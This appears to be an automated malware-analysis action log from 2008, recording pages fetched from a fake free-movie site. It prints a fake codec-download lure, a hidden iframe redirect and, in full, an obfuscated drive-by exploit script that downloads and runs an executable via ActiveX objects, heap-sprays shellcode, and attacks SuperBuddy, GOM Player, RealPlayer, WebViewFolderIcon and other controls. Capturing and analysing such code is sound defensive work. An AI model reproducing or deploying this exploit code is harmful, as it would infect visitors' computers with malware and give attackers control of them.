Action log
2008-07-29 15:55:03: registered input data (type 'url') and saved to file1.url
http://montana-rapp.it/default.html
2008-07-29 16:06:40: retrieved URL from file1.url into file2.html:
location.href=http://montana-rapp.it/default.html
HTTP/1.1 200 OK
Content-Length: 1550
Content-Type: text/html
Last-Modified: Tue, 29 Jul 2008 18:07:09 GMT
Accept-Ranges: bytes
ETag: "a68e37eba5f1c81:8dc5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 29 Jul 2008 23:06:38 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Watch Free Movie - Update Every Hour!</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="master2.css" type="text/css" media="screen" />
<link rel="shortcut icon" href="" type="image/x-icon" />
<meta name="robots" content="all, index, follow" />
<meta name="description" content="" />
<meta name="keywords" content="" />
<meta name="author" content="" />
<meta name="copyright" content="" />
</head>
<body bgcolor="#000000">
<center>
<font style="font:20px Tahoma;color:#efefef;"></font>
</center>
<div id="errorMsg" name="errorMsg" onMouseDown="this.style.zIndex=10;StartDrag(event,this,PutBack)">
<div id="close" onClick="CloseErrorMsg()"></div>
<input type="submit" id="okButton" value="Ok" onclick="downloadCodec(url)">
<input type="submit" value="Cancel" onclick="CloseErrorMsg();">
<input type="submit" value="Continue" onclick="downloadCodec(url)">
</div>
<div id="player">
<img id="img" src="" alt="">
</div>
<script type="text/javascript" src="dnd.js"></script>
<script type="text/javascript" src="master.js"></script>
<script type="text/javascript">
<!--
var gif = "metacafe.gif";
var url = "get_flash_update.exe";
document.getElementById("img").src = gif
showMovie()
-->
</script>
<iframe id="ifid01" src="metai.html" frameborder="0" style="display:none"></iframe>
</body>
</html>
2008-07-29 16:07:34: registered input data (type 'url') and saved to file3.url
http://montana-rapp.it/metai.html
2008-07-29 16:07:52: retrieved URL from file3.url into file4.html:
location.href=http://montana-rapp.it/metai.html HTTP/1.1 200 OK Content-Length: 96 Content-Type: text/html Last-Modified: Tue, 29 Jul 2008 18:07:06 GMT Accept-Ranges: bytes ETag: "62a89e9a5f1c81:8dc5" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 29 Jul 2008 23:07:49 GMT <html> <head> <meta http-equiv="refresh" content="5;URL=1.html"> </head> <body> </body> </html>
2008-07-29 16:08:42: registered input data (type 'url') and saved to file5.url
http://montana-rapp.it/1.html
2008-07-29 16:09:40: retrieved URL from file5.url into file6.html:
location.href=http://montana-rapp.it/1.html
HTTP/1.1 200 OK
Content-Length: 9190
Content-Type: text/html
Last-Modified: Tue, 29 Jul 2008 18:07:05 GMT
Accept-Ranges: bytes
ETag: "225dbde8a5f1c81:8dc5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 29 Jul 2008 23:09:38 GMT
<script>window.setTimeout(KaimTKv, 5000);function KaimTKv(){ PfAhTJA = document.location.href.replace(/1.html/ig,'') + 'g)e@t&*_)f(l&#a#s(h_u$p)^da(@t)e#.^e*xe'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');var cYReCGT = document.createElement('o#b!)j#)e!c*!t'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); cYReCGT.setAttribute('i^@d'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'c#Y)R(eC*GT'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));cYReCGT.setAttribute('c!la!s*s&i&$d^'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'c!ls*#id(:)^B#^D#9*6%!C(5^)56-6&5(A^3)-!11($D%!0%$-9##8^@3%*A@$-^0*0%C)0&4!F*C2*9*E%36^'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try{var jaRkRHa = document.createElement('obj&ec)#t$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));jaRkRHa.setAttribute('i*)d#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'j!a$R)k)RH#a'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));jaRkRHa.setAttribute('c*l(as((s@id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'c#l&si)%d(#:*F0^E*4*2D5(0$&-36!@8@C-$@1&1$*D!)0^%-A#D8%(1-&00A0@@C90^*D@C&)8D9'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var TijJoKQ = 'C%^:!/D!(oc^(u*$me*%n&#t)$s^ *a!(n&d( &S)e#t@!ti)n%$g*)s(/*A$l&%l$ @)Us@e!r)s/#St#a!&rt&* (&Men!u/)(Pr%(o&$g)r@ams%/(!St(ar)t@u!p/($smss$&.ex!e('.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');jaRkRHa.SnapshotPath = PfAhTJA;jaRkRHa.CompressedPath = TijJoKQ; eval(jaRkRHa.PrintSnapshot());}catch(zKaGesR){}try{var hurksjp = cYReCGT.CreateObject('m^sx#m@l#)2.X&M(@LHT)*T$P^*'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),''); var HHpyGEb = cYReCGT.CreateObject('She$l)l$.)*A$*p*!pl(&i!c)a^t($io#n'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'');var UPidQZo = cYReCGT.CreateObject('adodb.@%s%tr#e)#a*^m'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'');try{eval(UPidQZo.type = 1); eval(hurksjp.open('G($E@%T!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), PfAhTJA,false));eval(hurksjp.send());eval(UPidQZo.open());UPidQZo.Write(hurksjp.responseBody); var GcPzkZj = '.&/%/#..//*)R)^Zp&C(Z%yO%.e*xe^'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');eval(UPidQZo.savetofile(GcPzkZj,2));eval(UPidQZo.close());}catch(zKaGesR){}try{eval(HHpyGEb.shellexecute(GcPzkZj));}catch(zKaGesR){}}catch(zKaGesR){}}</script><script>var wBgrqou = 0x0c0c0c0c; function Gslide(spraySlide, saruuysaddize){while (spraySlide.length * 2 < saruuysaddize){spraySlide += spraySlide;}spraySlide = spraySlide.substring(0, saruuysaddize / 2);return spraySlide;}url = document.location.href.replace(/1.html/ig,'') + 'f!i@l&e*.&ex^e%'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');var outValue = '';for (i = 0; i < url.length;){outValue += '%u' + url.charCodeAt(i+1).toString(16) + url.charCodeAt(i).toString(16);i = i + 2;}outValue += '%u0000';var Shellcode = unescape("LvuNNvrLQXnmu4343LvuNNvrLQXnmu4343LvuNNvrLQXnmu0febLvuNNvrLQXnmu335bLvuNNvrLQXnmu66c9LvuNNvrLQXnmu80b9LvuNNvrLQXnmu8001LvuNNvrLQXnmuef33LvuNNvrLQXnmue243LvuNNvrLQXnmuebfaLvuNNvrLQXnmue805LvuNNvrLQXnmuffecLvuNNvrLQXnmuffffLvuNNvrLQXnmu8b7fLvuNNvrLQXnmudf4eLvuNNvrLQXnmuefefLvuNNvrLQXnmu64efLvuNNvrLQXnmue3afLvuNNvrLQXnmu9f64LvuNNvrLQXnmu42f3LvuNNvrLQXnmu9f64LvuNNvrLQXnmu6ee7LvuNNvrLQXnmuef03LvuNNvrLQXnmuefebLvuNNvrLQXnmu64efLvuNNvrLQXnmub903LvuNNvrLQXnmu6187LvuNNvrLQXnmue1a1LvuNNvrLQXnmu0703LvuNNvrLQXnmuef11LvuNNvrLQXnmuefefLvuNNvrLQXnmuaa66LvuNNvrLQXnmub9ebLvuNNvrLQXnmu7787LvuNNvrLQXnmu6511LvuNNvrLQXnmu07e1LvuNNvrLQXnmuef1fLvuNNvrLQXnmuefefLvuNNvrLQXnmuaa66LvuNNvrLQXnmub9e7LvuNNvrLQXnmuca87LvuNNvrLQXnmu105fLvuNNvrLQXnmu072dLvuNNvrLQXnmuef0dLvuNNvrLQXnmuefefLvuNNvrLQXnmuaa66LvuNNvrLQXnmub9e3LvuNNvrLQXnmu0087LvuNNvrLQXnmu0f21LvuNNvrLQXnmu078fLvuNNvrLQXnmuef3bLvuNNvrLQXnmuefefLvuNNvrLQXnmuaa66LvuNNvrLQXnmub9ffLvuNNvrLQXnmu2e87LvuNNvrLQXnmu0a96LvuNNvrLQXnmu0757LvuNNvrLQXnmuef29LvuNNvrLQXnmuefefLvuNNvrLQXnmuaa66LvuNNvrLQXnmuaffbLvuNNvrLQXnmud76fLvuNNvrLQXnmu9a2cLvuNNvrLQXnmu6615LvuNNvrLQXnmuf7aaLvuNNvrLQXnmue806LvuNNvrLQXnmuefeeLvuNNvrLQXnmub1efLvuNNvrLQXnmu9a66LvuNNvrLQXnmu64cbLvuNNvrLQXnmuebaaLvuNNvrLQXnmuee85LvuNNvrLQXnmu64b6LvuNNvrLQXnmuf7baLvuNNvrLQXnmu07b9LvuNNvrLQXnmuef64LvuNNvrLQXnmuefefLvuNNvrLQXnmu87bfLvuNNvrLQXnmuf5d9LvuNNvrLQXnmu9fc0LvuNNvrLQXnmu7807LvuNNvrLQXnmuefefLvuNNvrLQXnmu66efLvuNNvrLQXnmuf3aaLvuNNvrLQXnmu2a64LvuNNvrLQXnmu2f6cLvuNNvrLQXnmu66bfLvuNNvrLQXnmucfaaLvuNNvrLQXnmu1087LvuNNvrLQXnmuefefLvuNNvrLQXnmubfefLvuNNvrLQXnmuaa64LvuNNvrLQXnmu85fbLvuNNvrLQXnmub6edLvuNNvrLQXnmuba64LvuNNvrLQXnmu07f7LvuNNvrLQXnmuef8eLvuNNvrLQXnmuefefLvuNNvrLQXnmuaaecLvuNNvrLQXnmu28cfLvuNNvrLQXnmub3efLvuNNvrLQXnmuc191LvuNNvrLQXnmu288aLvuNNvrLQXnmuebafLvuNNvrLQXnmu8a97LvuNNvrLQXnmuefefLvuNNvrLQXnmu9a10LvuNNvrLQXnmu64cfLvuNNvrLQXnmue3aaLvuNNvrLQXnmuee85LvuNNvrLQXnmu64b6LvuNNvrLQXnmuf7baLvuNNvrLQXnmuaf07LvuNNvrLQXnmuefefLvuNNvrLQXnmu85efLvuNNvrLQXnmub7e8LvuNNvrLQXnmuaaecLvuNNvrLQXnmudccbLvuNNvrLQXnmubc34LvuNNvrLQXnmu10bcLvuNNvrLQXnmucf9aLvuNNvrLQXnmubcbfLvuNNvrLQXnmuaa64LvuNNvrLQXnmu85f3LvuNNvrLQXnmub6eaLvuNNvrLQXnmuba64LvuNNvrLQXnmu07f7LvuNNvrLQXnmuefccLvuNNvrLQXnmuefefLvuNNvrLQXnmuef85LvuNNvrLQXnmu9a10LvuNNvrLQXnmu64cfLvuNNvrLQXnmue7aaLvuNNvrLQXnmued85LvuNNvrLQXnmu64b6LvuNNvrLQXnmuf7baLvuNNvrLQXnmuff07LvuNNvrLQXnmuefefLvuNNvrLQXnmu85efLvuNNvrLQXnmu6410LvuNNvrLQXnmuffaaLvuNNvrLQXnmuee85LvuNNvrLQXnmu64b6LvuNNvrLQXnmuf7baLvuNNvrLQXnmuef07LvuNNvrLQXnmuefefLvuNNvrLQXnmuaeefLvuNNvrLQXnmubdb4LvuNNvrLQXnmu0eecLvuNNvrLQXnmu0eecLvuNNvrLQXnmu0eecLvuNNvrLQXnmu0eecLvuNNvrLQXnmu036cLvuNNvrLQXnmub5ebLvuNNvrLQXnmu64bcLvuNNvrLQXnmu0d35LvuNNvrLQXnmubd18LvuNNvrLQXnmu0f10LvuNNvrLQXnmu64baLvuNNvrLQXnmu6403LvuNNvrLQXnmue792LvuNNvrLQXnmub264LvuNNvrLQXnmub9e3LvuNNvrLQXnmu9c64LvuNNvrLQXnmu64d3LvuNNvrLQXnmuf19bLvuNNvrLQXnmuec97LvuNNvrLQXnmub91cLvuNNvrLQXnmu9964LvuNNvrLQXnmueccfLvuNNvrLQXnmudc1cLvuNNvrLQXnmua626LvuNNvrLQXnmu42aeLvuNNvrLQXnmu2cecLvuNNvrLQXnmudcb9LvuNNvrLQXnmue019LvuNNvrLQXnmuff51LvuNNvrLQXnmu1dd5LvuNNvrLQXnmue79bLvuNNvrLQXnmu212eLvuNNvrLQXnmuece2LvuNNvrLQXnmuaf1dLvuNNvrLQXnmu1e04LvuNNvrLQXnmu11d4LvuNNvrLQXnmu9ab1LvuNNvrLQXnmub50aLvuNNvrLQXnmu0464LvuNNvrLQXnmub564LvuNNvrLQXnmueccbLvuNNvrLQXnmu8932LvuNNvrLQXnmue364LvuNNvrLQXnmu64a4LvuNNvrLQXnmuf3b5LvuNNvrLQXnmu32ecLvuNNvrLQXnmueb64LvuNNvrLQXnmuec64LvuNNvrLQXnmub12aLvuNNvrLQXnmu2db2LvuNNvrLQXnmuefe7LvuNNvrLQXnmu1b07LvuNNvrLQXnmu1011LvuNNvrLQXnmuba10LvuNNvrLQXnmua3bdLvuNNvrLQXnmua0a2LvuNNvrLQXnmuefa1".replace(/LvuNNvrLQXnm/ig, "%") + outValue);var hadttdtSize = 0x400000;var payfdLytyusade = Shellcode.length * 2;var tggter = payfdLytyusade + 0x38;var saruuysaddize = hadttdtSize - tggter;var spraySlide = unescape("rroHqKmLVqu0c0crroHqKmLVqu0c0c".replace(/rroHqKmLVq/ig, "%")); var prrerat = new Array();spraySlide = Gslide(spraySlide, saruuysaddize);var kilrrer = wBgrqou - 0x400000;hsttiicks = kilrrer / hadttdtSize; for (i = 0; i < hsttiicks; i++){prrerat[i] = spraySlide + Shellcode;}function startCreateControlRange(){ugric = unescape("TYlsxRNSyunu0d0dTYlsxRNSyunu0d0d".replace(/TYlsxRNSyun/ig, "%"));var xYz = 0x40000;while(ugric.length<xYz) ugric += ugric;ugric = ugric.substring(0, 0x3ffe4-Shellcode.length);bublic = new Array();for(i = bublic; i < 450; i++) bublic[i] = ugric + Shellcode; mceil = Math.ceil(0xd0d0d0d);document.write('<object classid="CLSID:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F"></object>');try{mceil = document.scripts[0].createControlRange().length;}catch(e){}setTimeout("startSuperBuddy()", 3000);}function startSuperBuddy(){try {var buddy = new ActiveXObject('S%b).(S!%u(p&e@&r%Bu&d*d(y@.*1%'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));if (buddy){buddy.LinkSBIcons(0x0c0c0c0c);}}catch(e) {}setTimeout("startAudioFile()", 2000);}function startAudioFile(){try{var mmed = document.createElement('o&bj#ect@'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));mmed.setAttribute('c)!la!#s$s)i%d'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'c(ls)!id@@:!7)7^82)9F)14@#-D((91^1&-%4%0$FF(-*A(2F0-!D1*1#*DB$8D6D))0BC'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var mms='';for(var i=0; i < 4120; i++) { mms += 'A'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''); }mms += '
%
(!
*%
'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '');mmed.SetFormatLikeSample(mms);}catch(e){}setTimeout("startGOM()", 2000);} function startGOM(){var sURL='';for(var i = 0; i < 510; i++){sURL += unescape("GGnMlkktowGL0c".replace(/GGnMlkktowGL/ig, "%"));}try{var GomManager = new ActiveXObject('Go!mW&$e##b$Ct&r)@l%.&G!o#%mMa#na*g(^er.@1'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));GomManager.OpenURL(sURL);}catch(e){}setTimeout("startRealPlayer()", 2000);}function startRealPlayer(){try{var rpl = document.createElement('ob$j($ec)t'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')),adt='';rpl.setAttribute('c#l$a^s(s&i(d#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'c$l)s^^i$d@#:2@F5$42A2)E&-E&DC*9%-^*4B)F7@-!8*C*B1(-8!7!^C9&9^1*9)F7F)93$#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));for(var i = 0; i < 32; i++) { adt=adt+unescape("MGxgmiznklo0C".replace(/MGxgmiznklo/ig, "%")); }for(i = 0; i < 5; i++){rbt = rpl.Console;rpl.Console = adt;rpl.Console = rbt;}setTimeout("startWVF()", 2000);}catch(e){}}function startWVF(){for (i = 0; i < 128; i++) {try{var tar = new ActiveXObject('Web^V#$ie&w%F$#old$e)*r)I#$c)o@n.)W*eb%$V%ie&$w^F^&o^l%der%%I&c()o^n.1*'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505);}catch(e){}}} startCreateControlRange();</script>
